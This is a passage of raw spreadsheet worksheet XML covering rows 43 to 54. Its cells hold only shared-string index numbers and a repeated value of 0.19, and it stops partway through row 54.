        <v>657</v>
      </c>
      <c r="E43" s="60" t="s">
        <v>658</v>
      </c>
      <c r="F43" s="96" t="s">
        <v>659</v>
      </c>
      <c r="G43" s="7" t="s">
        <v>660</v>
      </c>
      <c r="H43" s="7" t="s">
        <v>491</v>
      </c>
      <c r="I43" s="41" t="s">
        <v>661</v>
      </c>
      <c r="J43" s="7" t="s">
        <v>662</v>
      </c>
      <c r="K43" s="7" t="s">
        <v>663</v>
      </c>
      <c r="L43" s="7"/>
      <c r="M43" s="7" t="s">
        <v>68</v>
      </c>
      <c r="N43" s="7" t="s">
        <v>69</v>
      </c>
      <c r="O43" s="58" t="s">
        <v>70</v>
      </c>
      <c r="P43" s="60" t="s">
        <v>159</v>
      </c>
      <c r="Q43" s="58" t="s">
        <v>72</v>
      </c>
      <c r="R43" s="58"/>
      <c r="S43" s="58" t="s">
        <v>74</v>
      </c>
      <c r="T43" s="7" t="s">
        <v>664</v>
      </c>
      <c r="U43" s="7"/>
      <c r="V43" s="7"/>
      <c r="W43" s="7" t="s">
        <v>147</v>
      </c>
      <c r="X43" s="7"/>
      <c r="Y43" s="7"/>
      <c r="Z43" s="7"/>
      <c r="AA43" s="7"/>
      <c r="AB43" s="7"/>
      <c r="AC43" s="7"/>
      <c r="AD43" s="7"/>
      <c r="AE43" s="7"/>
      <c r="AF43" s="7"/>
      <c r="AG43" s="7"/>
      <c r="AH43" s="7"/>
      <c r="AI43" s="7"/>
      <c r="AJ43" s="7" t="s">
        <v>221</v>
      </c>
      <c r="AK43" s="7"/>
      <c r="AL43" s="7"/>
      <c r="AM43" s="7"/>
      <c r="AN43" s="60" t="s">
        <v>426</v>
      </c>
      <c r="AO43" s="60" t="s">
        <v>427</v>
      </c>
      <c r="AV43" s="60" t="s">
        <v>665</v>
      </c>
      <c r="AW43" s="143" t="s">
        <v>666</v>
      </c>
      <c r="BE43" s="145">
        <v>0.19</v>
      </c>
    </row>
    <row r="44" s="60" customFormat="1" ht="123.75" spans="1:57">
      <c r="A44" s="91" t="s">
        <v>667</v>
      </c>
      <c r="B44" s="92" t="s">
        <v>430</v>
      </c>
      <c r="C44" s="92"/>
      <c r="D44" s="7" t="s">
        <v>668</v>
      </c>
      <c r="F44" s="96"/>
      <c r="G44" s="7"/>
      <c r="H44" s="7" t="s">
        <v>491</v>
      </c>
      <c r="I44" s="41" t="s">
        <v>669</v>
      </c>
      <c r="J44" s="7" t="s">
        <v>670</v>
      </c>
      <c r="K44" s="7" t="s">
        <v>424</v>
      </c>
      <c r="L44" s="7"/>
      <c r="M44" s="7"/>
      <c r="N44" s="7"/>
      <c r="O44" s="7" t="s">
        <v>70</v>
      </c>
      <c r="P44" s="7" t="s">
        <v>159</v>
      </c>
      <c r="Q44" s="7"/>
      <c r="R44" s="7"/>
      <c r="S44" s="7" t="s">
        <v>74</v>
      </c>
      <c r="T44" s="7" t="s">
        <v>671</v>
      </c>
      <c r="U44" s="7"/>
      <c r="V44" s="7"/>
      <c r="W44" s="34" t="s">
        <v>117</v>
      </c>
      <c r="X44" s="7"/>
      <c r="Y44" s="7"/>
      <c r="Z44" s="7"/>
      <c r="AA44" s="7"/>
      <c r="AB44" s="7"/>
      <c r="AC44" s="7"/>
      <c r="AD44" s="7"/>
      <c r="AE44" s="7"/>
      <c r="AF44" s="7"/>
      <c r="AG44" s="7"/>
      <c r="AH44" s="7"/>
      <c r="AI44" s="7"/>
      <c r="AJ44" s="34" t="s">
        <v>221</v>
      </c>
      <c r="AK44" s="7"/>
      <c r="AL44" s="7"/>
      <c r="AM44" s="7"/>
      <c r="AN44" s="7" t="s">
        <v>426</v>
      </c>
      <c r="AO44" s="34" t="s">
        <v>427</v>
      </c>
      <c r="AP44" s="7"/>
      <c r="AQ44" s="7"/>
      <c r="AR44" s="7"/>
      <c r="AS44" s="7"/>
      <c r="AT44" s="7"/>
      <c r="AU44" s="7"/>
      <c r="AV44" s="7"/>
      <c r="AW44" s="7" t="s">
        <v>428</v>
      </c>
      <c r="AX44" s="7"/>
      <c r="AZ44" s="7"/>
      <c r="BE44" s="145">
        <v>0.19</v>
      </c>
    </row>
    <row r="45" s="60" customFormat="1" ht="409.5" spans="1:57">
      <c r="A45" s="91" t="s">
        <v>672</v>
      </c>
      <c r="B45" s="92" t="s">
        <v>673</v>
      </c>
      <c r="C45" s="92"/>
      <c r="D45" s="108" t="s">
        <v>674</v>
      </c>
      <c r="E45" s="60" t="s">
        <v>675</v>
      </c>
      <c r="F45" s="7" t="s">
        <v>676</v>
      </c>
      <c r="G45" s="7"/>
      <c r="H45" s="108" t="s">
        <v>677</v>
      </c>
      <c r="I45" s="41" t="s">
        <v>678</v>
      </c>
      <c r="J45" s="7" t="s">
        <v>679</v>
      </c>
      <c r="K45" s="108" t="s">
        <v>424</v>
      </c>
      <c r="L45" s="108"/>
      <c r="M45" s="108" t="s">
        <v>68</v>
      </c>
      <c r="N45" s="108" t="s">
        <v>69</v>
      </c>
      <c r="O45" s="7" t="s">
        <v>70</v>
      </c>
      <c r="P45" s="60" t="s">
        <v>159</v>
      </c>
      <c r="Q45" s="58" t="s">
        <v>72</v>
      </c>
      <c r="R45" s="7"/>
      <c r="S45" s="7" t="s">
        <v>299</v>
      </c>
      <c r="T45" s="60" t="s">
        <v>680</v>
      </c>
      <c r="U45" s="58"/>
      <c r="V45" s="58"/>
      <c r="W45" s="58" t="s">
        <v>117</v>
      </c>
      <c r="AF45" s="58"/>
      <c r="AG45" s="58"/>
      <c r="AH45" s="58"/>
      <c r="AI45" s="58"/>
      <c r="AJ45" s="60" t="s">
        <v>221</v>
      </c>
      <c r="AK45" s="58"/>
      <c r="AL45" s="58"/>
      <c r="AM45" s="58"/>
      <c r="AN45" s="60" t="s">
        <v>239</v>
      </c>
      <c r="AO45" s="60" t="s">
        <v>637</v>
      </c>
      <c r="AW45" s="60" t="s">
        <v>681</v>
      </c>
      <c r="BE45" s="145">
        <v>0.19</v>
      </c>
    </row>
    <row r="46" s="60" customFormat="1" ht="382.5" spans="1:57">
      <c r="A46" s="91" t="s">
        <v>682</v>
      </c>
      <c r="B46" s="109" t="s">
        <v>683</v>
      </c>
      <c r="C46" s="109"/>
      <c r="D46" s="7" t="s">
        <v>684</v>
      </c>
      <c r="E46" s="60" t="s">
        <v>685</v>
      </c>
      <c r="F46" s="60" t="s">
        <v>686</v>
      </c>
      <c r="G46" s="99" t="s">
        <v>687</v>
      </c>
      <c r="H46" s="7" t="s">
        <v>677</v>
      </c>
      <c r="I46" s="41" t="s">
        <v>688</v>
      </c>
      <c r="J46" s="7" t="s">
        <v>689</v>
      </c>
      <c r="K46" s="7" t="s">
        <v>424</v>
      </c>
      <c r="L46" s="7"/>
      <c r="M46" s="7" t="s">
        <v>68</v>
      </c>
      <c r="N46" s="7" t="s">
        <v>237</v>
      </c>
      <c r="O46" s="7" t="s">
        <v>70</v>
      </c>
      <c r="P46" s="60" t="s">
        <v>159</v>
      </c>
      <c r="Q46" s="58" t="s">
        <v>72</v>
      </c>
      <c r="R46" s="7"/>
      <c r="S46" s="7" t="s">
        <v>299</v>
      </c>
      <c r="T46" s="60" t="s">
        <v>690</v>
      </c>
      <c r="U46" s="58"/>
      <c r="V46" s="58"/>
      <c r="W46" s="58" t="s">
        <v>117</v>
      </c>
      <c r="AF46" s="58"/>
      <c r="AG46" s="58"/>
      <c r="AH46" s="58"/>
      <c r="AI46" s="58"/>
      <c r="AJ46" s="60" t="s">
        <v>221</v>
      </c>
      <c r="AK46" s="58"/>
      <c r="AL46" s="58"/>
      <c r="AM46" s="58"/>
      <c r="AN46" s="60" t="s">
        <v>239</v>
      </c>
      <c r="AO46" s="60" t="s">
        <v>691</v>
      </c>
      <c r="AW46" s="60" t="s">
        <v>692</v>
      </c>
      <c r="BE46" s="145">
        <v>0.19</v>
      </c>
    </row>
    <row r="47" s="60" customFormat="1" ht="168.75" spans="1:57">
      <c r="A47" s="91" t="s">
        <v>693</v>
      </c>
      <c r="B47" s="92"/>
      <c r="C47" s="92"/>
      <c r="D47" s="7" t="s">
        <v>694</v>
      </c>
      <c r="E47" s="60" t="s">
        <v>695</v>
      </c>
      <c r="F47" s="60" t="s">
        <v>696</v>
      </c>
      <c r="G47" s="99" t="s">
        <v>697</v>
      </c>
      <c r="H47" s="7" t="s">
        <v>677</v>
      </c>
      <c r="I47" s="41" t="s">
        <v>698</v>
      </c>
      <c r="J47" s="7" t="s">
        <v>699</v>
      </c>
      <c r="K47" s="7" t="s">
        <v>700</v>
      </c>
      <c r="L47" s="7"/>
      <c r="M47" s="7" t="s">
        <v>368</v>
      </c>
      <c r="N47" s="7" t="s">
        <v>237</v>
      </c>
      <c r="O47" s="7" t="s">
        <v>70</v>
      </c>
      <c r="P47" s="60" t="s">
        <v>159</v>
      </c>
      <c r="Q47" s="58" t="s">
        <v>72</v>
      </c>
      <c r="R47" s="7"/>
      <c r="S47" s="7" t="s">
        <v>299</v>
      </c>
      <c r="T47" s="60" t="s">
        <v>701</v>
      </c>
      <c r="U47" s="58"/>
      <c r="V47" s="58"/>
      <c r="W47" s="58" t="s">
        <v>117</v>
      </c>
      <c r="AF47" s="58"/>
      <c r="AG47" s="58"/>
      <c r="AH47" s="58"/>
      <c r="AI47" s="58"/>
      <c r="AJ47" s="60" t="s">
        <v>221</v>
      </c>
      <c r="AK47" s="58"/>
      <c r="AL47" s="58"/>
      <c r="AM47" s="58"/>
      <c r="AN47" s="60" t="s">
        <v>239</v>
      </c>
      <c r="AO47" s="60" t="s">
        <v>637</v>
      </c>
      <c r="AW47" s="60" t="s">
        <v>702</v>
      </c>
      <c r="BE47" s="145">
        <v>0.19</v>
      </c>
    </row>
    <row r="48" s="60" customFormat="1" ht="317" customHeight="1" spans="1:57">
      <c r="A48" s="110" t="s">
        <v>703</v>
      </c>
      <c r="B48" s="92" t="s">
        <v>704</v>
      </c>
      <c r="C48" s="92" t="s">
        <v>486</v>
      </c>
      <c r="D48" s="7" t="s">
        <v>705</v>
      </c>
      <c r="E48" s="60" t="s">
        <v>706</v>
      </c>
      <c r="F48" s="60" t="s">
        <v>707</v>
      </c>
      <c r="G48" s="94" t="s">
        <v>708</v>
      </c>
      <c r="H48" s="7" t="s">
        <v>709</v>
      </c>
      <c r="I48" s="41" t="s">
        <v>710</v>
      </c>
      <c r="J48" s="7" t="s">
        <v>711</v>
      </c>
      <c r="K48" s="7" t="s">
        <v>145</v>
      </c>
      <c r="L48" s="7" t="s">
        <v>67</v>
      </c>
      <c r="M48" s="7" t="s">
        <v>68</v>
      </c>
      <c r="N48" s="7" t="s">
        <v>69</v>
      </c>
      <c r="O48" s="60" t="s">
        <v>70</v>
      </c>
      <c r="P48" s="60" t="s">
        <v>159</v>
      </c>
      <c r="Q48" s="58" t="s">
        <v>712</v>
      </c>
      <c r="R48" s="58" t="s">
        <v>84</v>
      </c>
      <c r="S48" s="60" t="s">
        <v>74</v>
      </c>
      <c r="T48" s="7" t="s">
        <v>713</v>
      </c>
      <c r="U48" s="7" t="s">
        <v>70</v>
      </c>
      <c r="V48" s="7" t="s">
        <v>714</v>
      </c>
      <c r="W48" s="7" t="s">
        <v>117</v>
      </c>
      <c r="X48" s="7" t="s">
        <v>84</v>
      </c>
      <c r="Y48" s="7" t="s">
        <v>118</v>
      </c>
      <c r="Z48" s="7" t="s">
        <v>119</v>
      </c>
      <c r="AA48" s="7" t="s">
        <v>715</v>
      </c>
      <c r="AB48" s="7" t="s">
        <v>716</v>
      </c>
      <c r="AC48" s="7" t="s">
        <v>717</v>
      </c>
      <c r="AD48" s="7" t="s">
        <v>84</v>
      </c>
      <c r="AE48" s="7" t="s">
        <v>718</v>
      </c>
      <c r="AF48" s="7" t="s">
        <v>719</v>
      </c>
      <c r="AG48" s="7"/>
      <c r="AH48" s="7" t="s">
        <v>720</v>
      </c>
      <c r="AI48" s="7"/>
      <c r="AJ48" s="7" t="s">
        <v>221</v>
      </c>
      <c r="AK48" s="7" t="s">
        <v>721</v>
      </c>
      <c r="AL48" s="7" t="s">
        <v>722</v>
      </c>
      <c r="AM48" s="7" t="s">
        <v>723</v>
      </c>
      <c r="AN48" s="60" t="s">
        <v>239</v>
      </c>
      <c r="AO48" s="60" t="s">
        <v>724</v>
      </c>
      <c r="AP48" s="60" t="s">
        <v>725</v>
      </c>
      <c r="AQ48" s="127" t="s">
        <v>563</v>
      </c>
      <c r="AR48" s="127" t="s">
        <v>726</v>
      </c>
      <c r="AS48" s="127" t="s">
        <v>727</v>
      </c>
      <c r="AT48" s="127" t="s">
        <v>728</v>
      </c>
      <c r="AU48" s="127" t="s">
        <v>729</v>
      </c>
      <c r="AV48" s="127" t="s">
        <v>730</v>
      </c>
      <c r="AW48" s="127" t="s">
        <v>731</v>
      </c>
      <c r="AX48" s="127" t="s">
        <v>732</v>
      </c>
      <c r="AY48" s="127" t="s">
        <v>416</v>
      </c>
      <c r="AZ48" s="127"/>
      <c r="BE48" s="145">
        <v>0.19</v>
      </c>
    </row>
    <row r="49" s="60" customFormat="1" ht="409.5" spans="1:57">
      <c r="A49" s="110" t="s">
        <v>733</v>
      </c>
      <c r="B49" s="109" t="s">
        <v>734</v>
      </c>
      <c r="C49" s="109" t="s">
        <v>486</v>
      </c>
      <c r="D49" s="7" t="s">
        <v>735</v>
      </c>
      <c r="E49" s="60" t="s">
        <v>736</v>
      </c>
      <c r="F49" s="94" t="s">
        <v>737</v>
      </c>
      <c r="G49" s="94" t="s">
        <v>738</v>
      </c>
      <c r="H49" s="7" t="s">
        <v>709</v>
      </c>
      <c r="I49" s="41" t="s">
        <v>739</v>
      </c>
      <c r="J49" s="7" t="s">
        <v>740</v>
      </c>
      <c r="K49" s="7" t="s">
        <v>396</v>
      </c>
      <c r="L49" s="7" t="s">
        <v>253</v>
      </c>
      <c r="M49" s="7" t="s">
        <v>741</v>
      </c>
      <c r="N49" s="7" t="s">
        <v>742</v>
      </c>
      <c r="O49" s="7" t="s">
        <v>70</v>
      </c>
      <c r="P49" s="60" t="s">
        <v>159</v>
      </c>
      <c r="Q49" s="7" t="s">
        <v>72</v>
      </c>
      <c r="R49" s="7" t="s">
        <v>84</v>
      </c>
      <c r="S49" s="7" t="s">
        <v>74</v>
      </c>
      <c r="T49" s="7" t="s">
        <v>743</v>
      </c>
      <c r="U49" s="7" t="s">
        <v>70</v>
      </c>
      <c r="V49" s="7" t="s">
        <v>744</v>
      </c>
      <c r="W49" s="7" t="s">
        <v>117</v>
      </c>
      <c r="X49" s="7" t="s">
        <v>84</v>
      </c>
      <c r="Y49" s="7" t="s">
        <v>162</v>
      </c>
      <c r="Z49" s="7" t="s">
        <v>745</v>
      </c>
      <c r="AA49" s="7" t="s">
        <v>746</v>
      </c>
      <c r="AB49" s="7"/>
      <c r="AC49" s="7"/>
      <c r="AD49" s="7" t="s">
        <v>747</v>
      </c>
      <c r="AE49" s="7" t="s">
        <v>748</v>
      </c>
      <c r="AF49" s="7" t="s">
        <v>749</v>
      </c>
      <c r="AG49" s="7"/>
      <c r="AH49" s="7" t="s">
        <v>750</v>
      </c>
      <c r="AI49" s="7"/>
      <c r="AJ49" s="7" t="s">
        <v>221</v>
      </c>
      <c r="AK49" s="7" t="s">
        <v>721</v>
      </c>
      <c r="AL49" s="7" t="s">
        <v>90</v>
      </c>
      <c r="AM49" s="7" t="s">
        <v>751</v>
      </c>
      <c r="AN49" s="60" t="s">
        <v>752</v>
      </c>
      <c r="AO49" s="60" t="s">
        <v>753</v>
      </c>
      <c r="AP49" s="60" t="s">
        <v>754</v>
      </c>
      <c r="AQ49" s="60" t="s">
        <v>755</v>
      </c>
      <c r="AR49" s="60" t="s">
        <v>726</v>
      </c>
      <c r="AS49" s="60" t="s">
        <v>565</v>
      </c>
      <c r="AT49" s="127"/>
      <c r="AU49" s="127" t="s">
        <v>756</v>
      </c>
      <c r="AV49" s="60" t="s">
        <v>757</v>
      </c>
      <c r="AW49" s="60" t="s">
        <v>758</v>
      </c>
      <c r="AX49" s="60" t="s">
        <v>759</v>
      </c>
      <c r="AY49" s="60" t="s">
        <v>760</v>
      </c>
      <c r="BE49" s="145">
        <v>0.19</v>
      </c>
    </row>
    <row r="50" s="60" customFormat="1" ht="409.5" spans="1:57">
      <c r="A50" s="91" t="s">
        <v>761</v>
      </c>
      <c r="B50" s="109" t="s">
        <v>762</v>
      </c>
      <c r="C50" s="109" t="s">
        <v>763</v>
      </c>
      <c r="D50" s="7" t="s">
        <v>764</v>
      </c>
      <c r="E50" s="60" t="s">
        <v>765</v>
      </c>
      <c r="F50" s="7" t="s">
        <v>766</v>
      </c>
      <c r="G50" s="94" t="s">
        <v>767</v>
      </c>
      <c r="H50" s="7" t="s">
        <v>709</v>
      </c>
      <c r="I50" s="41" t="s">
        <v>768</v>
      </c>
      <c r="J50" s="7" t="s">
        <v>769</v>
      </c>
      <c r="K50" s="7" t="s">
        <v>396</v>
      </c>
      <c r="L50" s="7" t="s">
        <v>253</v>
      </c>
      <c r="M50" s="7" t="s">
        <v>397</v>
      </c>
      <c r="N50" s="7" t="s">
        <v>742</v>
      </c>
      <c r="O50" s="7" t="s">
        <v>70</v>
      </c>
      <c r="P50" s="60" t="s">
        <v>159</v>
      </c>
      <c r="Q50" s="7" t="s">
        <v>72</v>
      </c>
      <c r="R50" s="7" t="s">
        <v>84</v>
      </c>
      <c r="S50" s="7" t="s">
        <v>74</v>
      </c>
      <c r="T50" s="7" t="s">
        <v>770</v>
      </c>
      <c r="U50" s="7" t="s">
        <v>771</v>
      </c>
      <c r="V50" s="7" t="s">
        <v>744</v>
      </c>
      <c r="W50" s="7" t="s">
        <v>117</v>
      </c>
      <c r="X50" s="7" t="s">
        <v>84</v>
      </c>
      <c r="Y50" s="7" t="s">
        <v>118</v>
      </c>
      <c r="Z50" s="7" t="s">
        <v>119</v>
      </c>
      <c r="AA50" s="7" t="s">
        <v>405</v>
      </c>
      <c r="AB50" s="7"/>
      <c r="AC50" s="7"/>
      <c r="AD50" s="7" t="s">
        <v>84</v>
      </c>
      <c r="AE50" s="7"/>
      <c r="AF50" s="7" t="s">
        <v>772</v>
      </c>
      <c r="AG50" s="7"/>
      <c r="AH50" s="7" t="s">
        <v>773</v>
      </c>
      <c r="AI50" s="7"/>
      <c r="AJ50" s="7" t="s">
        <v>221</v>
      </c>
      <c r="AK50" s="7" t="s">
        <v>774</v>
      </c>
      <c r="AL50" s="7" t="s">
        <v>167</v>
      </c>
      <c r="AM50" s="7" t="s">
        <v>91</v>
      </c>
      <c r="AN50" s="60" t="s">
        <v>775</v>
      </c>
      <c r="AO50" s="60" t="s">
        <v>776</v>
      </c>
      <c r="AP50" s="60" t="s">
        <v>725</v>
      </c>
      <c r="AQ50" s="60" t="s">
        <v>563</v>
      </c>
      <c r="AR50" s="60" t="s">
        <v>777</v>
      </c>
      <c r="AS50" s="60" t="s">
        <v>565</v>
      </c>
      <c r="AT50" s="60" t="s">
        <v>778</v>
      </c>
      <c r="AU50" s="60" t="s">
        <v>779</v>
      </c>
      <c r="AV50" s="60" t="s">
        <v>780</v>
      </c>
      <c r="AW50" s="60" t="s">
        <v>781</v>
      </c>
      <c r="AX50" s="60" t="s">
        <v>759</v>
      </c>
      <c r="AY50" s="60" t="s">
        <v>760</v>
      </c>
      <c r="BE50" s="145">
        <v>0.19</v>
      </c>
    </row>
    <row r="51" s="60" customFormat="1" ht="409.5" spans="1:57">
      <c r="A51" s="91" t="s">
        <v>782</v>
      </c>
      <c r="B51" s="92" t="s">
        <v>783</v>
      </c>
      <c r="C51" s="92" t="s">
        <v>784</v>
      </c>
      <c r="D51" s="7" t="s">
        <v>785</v>
      </c>
      <c r="E51" s="60" t="s">
        <v>786</v>
      </c>
      <c r="F51" s="7" t="s">
        <v>787</v>
      </c>
      <c r="G51" s="7" t="s">
        <v>788</v>
      </c>
      <c r="H51" s="7" t="s">
        <v>709</v>
      </c>
      <c r="I51" s="41" t="s">
        <v>789</v>
      </c>
      <c r="J51" s="7" t="s">
        <v>790</v>
      </c>
      <c r="K51" s="7" t="s">
        <v>791</v>
      </c>
      <c r="L51" s="7" t="s">
        <v>792</v>
      </c>
      <c r="M51" s="7" t="s">
        <v>368</v>
      </c>
      <c r="N51" s="60" t="s">
        <v>237</v>
      </c>
      <c r="O51" s="7" t="s">
        <v>583</v>
      </c>
      <c r="P51" s="60" t="s">
        <v>159</v>
      </c>
      <c r="Q51" s="7" t="s">
        <v>72</v>
      </c>
      <c r="R51" s="7" t="s">
        <v>84</v>
      </c>
      <c r="S51" s="7" t="s">
        <v>74</v>
      </c>
      <c r="T51" s="7" t="s">
        <v>793</v>
      </c>
      <c r="U51" s="7" t="s">
        <v>84</v>
      </c>
      <c r="V51" s="7"/>
      <c r="W51" s="7" t="s">
        <v>117</v>
      </c>
      <c r="X51" s="7" t="s">
        <v>84</v>
      </c>
      <c r="Y51" s="7" t="s">
        <v>118</v>
      </c>
      <c r="Z51" s="7" t="s">
        <v>119</v>
      </c>
      <c r="AA51" s="7" t="s">
        <v>746</v>
      </c>
      <c r="AB51" s="7"/>
      <c r="AC51" s="7"/>
      <c r="AD51" s="7" t="s">
        <v>84</v>
      </c>
      <c r="AE51" s="7"/>
      <c r="AF51" s="7" t="s">
        <v>794</v>
      </c>
      <c r="AG51" s="7"/>
      <c r="AH51" s="7" t="s">
        <v>122</v>
      </c>
      <c r="AI51" s="7"/>
      <c r="AJ51" s="7" t="s">
        <v>221</v>
      </c>
      <c r="AK51" s="7" t="s">
        <v>795</v>
      </c>
      <c r="AL51" s="7" t="s">
        <v>167</v>
      </c>
      <c r="AM51" s="7" t="s">
        <v>91</v>
      </c>
      <c r="AN51" s="60" t="s">
        <v>239</v>
      </c>
      <c r="AO51" s="60" t="s">
        <v>796</v>
      </c>
      <c r="AP51" s="60" t="s">
        <v>94</v>
      </c>
      <c r="AQ51" s="60" t="s">
        <v>563</v>
      </c>
      <c r="AR51" s="60" t="s">
        <v>564</v>
      </c>
      <c r="AS51" s="60" t="s">
        <v>565</v>
      </c>
      <c r="AT51" s="60" t="s">
        <v>564</v>
      </c>
      <c r="AU51" s="60" t="s">
        <v>797</v>
      </c>
      <c r="AV51" s="60" t="s">
        <v>798</v>
      </c>
      <c r="AW51" s="127" t="s">
        <v>799</v>
      </c>
      <c r="AX51" s="60" t="s">
        <v>511</v>
      </c>
      <c r="AY51" s="60" t="s">
        <v>800</v>
      </c>
      <c r="AZ51" s="60" t="s">
        <v>801</v>
      </c>
      <c r="BA51" s="60" t="s">
        <v>802</v>
      </c>
      <c r="BB51" s="60" t="s">
        <v>803</v>
      </c>
      <c r="BE51" s="145">
        <v>0.19</v>
      </c>
    </row>
    <row r="52" s="60" customFormat="1" ht="409" customHeight="1" spans="1:57">
      <c r="A52" s="91" t="s">
        <v>804</v>
      </c>
      <c r="B52" s="92" t="s">
        <v>805</v>
      </c>
      <c r="C52" s="92" t="s">
        <v>784</v>
      </c>
      <c r="D52" s="7" t="s">
        <v>806</v>
      </c>
      <c r="E52" s="60" t="s">
        <v>807</v>
      </c>
      <c r="F52" s="7" t="s">
        <v>808</v>
      </c>
      <c r="G52" s="94" t="s">
        <v>809</v>
      </c>
      <c r="H52" s="7" t="s">
        <v>709</v>
      </c>
      <c r="I52" s="41" t="s">
        <v>810</v>
      </c>
      <c r="J52" s="7" t="s">
        <v>811</v>
      </c>
      <c r="K52" s="7" t="s">
        <v>396</v>
      </c>
      <c r="L52" s="7" t="s">
        <v>253</v>
      </c>
      <c r="M52" s="7" t="s">
        <v>397</v>
      </c>
      <c r="N52" s="7" t="s">
        <v>742</v>
      </c>
      <c r="O52" s="7" t="s">
        <v>70</v>
      </c>
      <c r="P52" s="60" t="s">
        <v>159</v>
      </c>
      <c r="Q52" s="7" t="s">
        <v>498</v>
      </c>
      <c r="R52" s="7" t="s">
        <v>84</v>
      </c>
      <c r="S52" s="7" t="s">
        <v>74</v>
      </c>
      <c r="T52" s="7" t="s">
        <v>812</v>
      </c>
      <c r="U52" s="7" t="s">
        <v>70</v>
      </c>
      <c r="V52" s="7" t="s">
        <v>813</v>
      </c>
      <c r="W52" s="7" t="s">
        <v>117</v>
      </c>
      <c r="X52" s="7" t="s">
        <v>84</v>
      </c>
      <c r="Y52" s="7" t="s">
        <v>118</v>
      </c>
      <c r="Z52" s="7" t="s">
        <v>119</v>
      </c>
      <c r="AA52" s="7" t="s">
        <v>405</v>
      </c>
      <c r="AB52" s="7"/>
      <c r="AC52" s="7"/>
      <c r="AD52" s="7" t="s">
        <v>84</v>
      </c>
      <c r="AE52" s="7"/>
      <c r="AF52" s="7" t="s">
        <v>772</v>
      </c>
      <c r="AG52" s="7"/>
      <c r="AH52" s="7"/>
      <c r="AI52" s="7"/>
      <c r="AJ52" s="7" t="s">
        <v>221</v>
      </c>
      <c r="AK52" s="7" t="s">
        <v>795</v>
      </c>
      <c r="AL52" s="7" t="s">
        <v>167</v>
      </c>
      <c r="AM52" s="7" t="s">
        <v>91</v>
      </c>
      <c r="AN52" s="60" t="s">
        <v>239</v>
      </c>
      <c r="AO52" s="60" t="s">
        <v>814</v>
      </c>
      <c r="AP52" s="60" t="s">
        <v>94</v>
      </c>
      <c r="AQ52" s="60" t="s">
        <v>563</v>
      </c>
      <c r="AR52" s="60" t="s">
        <v>564</v>
      </c>
      <c r="AS52" s="60" t="s">
        <v>565</v>
      </c>
      <c r="AT52" s="60" t="s">
        <v>84</v>
      </c>
      <c r="AU52" s="60" t="s">
        <v>815</v>
      </c>
      <c r="AV52" s="60" t="s">
        <v>798</v>
      </c>
      <c r="AW52" s="127" t="s">
        <v>816</v>
      </c>
      <c r="AX52" s="60" t="s">
        <v>511</v>
      </c>
      <c r="AY52" s="60" t="s">
        <v>800</v>
      </c>
      <c r="AZ52" s="60" t="s">
        <v>817</v>
      </c>
      <c r="BA52" s="60" t="s">
        <v>818</v>
      </c>
      <c r="BB52" s="60" t="s">
        <v>819</v>
      </c>
      <c r="BE52" s="145">
        <v>0.19</v>
      </c>
    </row>
    <row r="53" s="60" customFormat="1" ht="409" customHeight="1" spans="1:57">
      <c r="A53" s="111" t="s">
        <v>820</v>
      </c>
      <c r="B53" s="109" t="s">
        <v>821</v>
      </c>
      <c r="C53" s="92" t="s">
        <v>784</v>
      </c>
      <c r="D53" s="7" t="s">
        <v>822</v>
      </c>
      <c r="E53" s="60" t="s">
        <v>823</v>
      </c>
      <c r="F53" s="7" t="s">
        <v>824</v>
      </c>
      <c r="G53" s="99" t="s">
        <v>825</v>
      </c>
      <c r="H53" s="7" t="s">
        <v>709</v>
      </c>
      <c r="I53" s="41" t="s">
        <v>826</v>
      </c>
      <c r="J53" s="7" t="s">
        <v>827</v>
      </c>
      <c r="K53" s="7" t="s">
        <v>424</v>
      </c>
      <c r="L53" s="7" t="s">
        <v>67</v>
      </c>
      <c r="M53" s="7" t="s">
        <v>68</v>
      </c>
      <c r="N53" s="7" t="s">
        <v>237</v>
      </c>
      <c r="O53" s="7" t="s">
        <v>70</v>
      </c>
      <c r="P53" s="60" t="s">
        <v>159</v>
      </c>
      <c r="Q53" s="7" t="s">
        <v>498</v>
      </c>
      <c r="R53" s="7" t="s">
        <v>84</v>
      </c>
      <c r="S53" s="7" t="s">
        <v>74</v>
      </c>
      <c r="T53" s="7" t="s">
        <v>828</v>
      </c>
      <c r="U53" s="7" t="s">
        <v>829</v>
      </c>
      <c r="V53" s="7" t="s">
        <v>744</v>
      </c>
      <c r="W53" s="7" t="s">
        <v>117</v>
      </c>
      <c r="X53" s="7" t="s">
        <v>84</v>
      </c>
      <c r="Y53" s="7" t="s">
        <v>118</v>
      </c>
      <c r="Z53" s="7" t="s">
        <v>119</v>
      </c>
      <c r="AA53" s="7" t="s">
        <v>746</v>
      </c>
      <c r="AB53" s="7"/>
      <c r="AC53" s="7"/>
      <c r="AD53" s="7" t="s">
        <v>70</v>
      </c>
      <c r="AE53" s="7" t="s">
        <v>830</v>
      </c>
      <c r="AF53" s="7" t="s">
        <v>831</v>
      </c>
      <c r="AG53" s="7"/>
      <c r="AH53" s="7" t="s">
        <v>832</v>
      </c>
      <c r="AI53" s="7"/>
      <c r="AJ53" s="7" t="s">
        <v>221</v>
      </c>
      <c r="AK53" s="7" t="s">
        <v>795</v>
      </c>
      <c r="AL53" s="7" t="s">
        <v>167</v>
      </c>
      <c r="AM53" s="7"/>
      <c r="AN53" s="60" t="s">
        <v>239</v>
      </c>
      <c r="AO53" s="60" t="s">
        <v>833</v>
      </c>
      <c r="AP53" s="60" t="s">
        <v>94</v>
      </c>
      <c r="AQ53" s="127" t="s">
        <v>563</v>
      </c>
      <c r="AR53" s="60" t="s">
        <v>834</v>
      </c>
      <c r="AT53" s="60" t="s">
        <v>835</v>
      </c>
      <c r="AU53" s="60" t="s">
        <v>836</v>
      </c>
      <c r="AV53" s="60" t="s">
        <v>837</v>
      </c>
      <c r="AW53" s="60" t="s">
        <v>838</v>
      </c>
      <c r="AX53" s="127" t="s">
        <v>839</v>
      </c>
      <c r="AY53" s="60" t="s">
        <v>840</v>
      </c>
      <c r="AZ53" s="60" t="s">
        <v>841</v>
      </c>
      <c r="BE53" s="145">
        <v>0.19</v>
      </c>
    </row>
    <row r="54" s="61" customFormat="1" ht="409.5" spans="1:57">
      <c r="A54" s="112" t="s">
        <v>842</v>
      </c>
      <c r="B54" s="61" t="s">
        <v>843</v>
      </c>
      <c r="C54" s="113" t="s">
        <v>844</v>
      </c>
      <c r="D54" s="112" t="s">
        <v>845</v>
      </c>
      <c r="E54" s="61" t="s">
        <v>765</v>
      </c>
      <c r="F54" s="114" t="s">
        <v>846</v>
      </c>
      <c r="G54" s="61" t="s">
        <v>767</v>
      </c>
      <c r="H54" s="61" t="s">
        <v>847</v>
      </c>
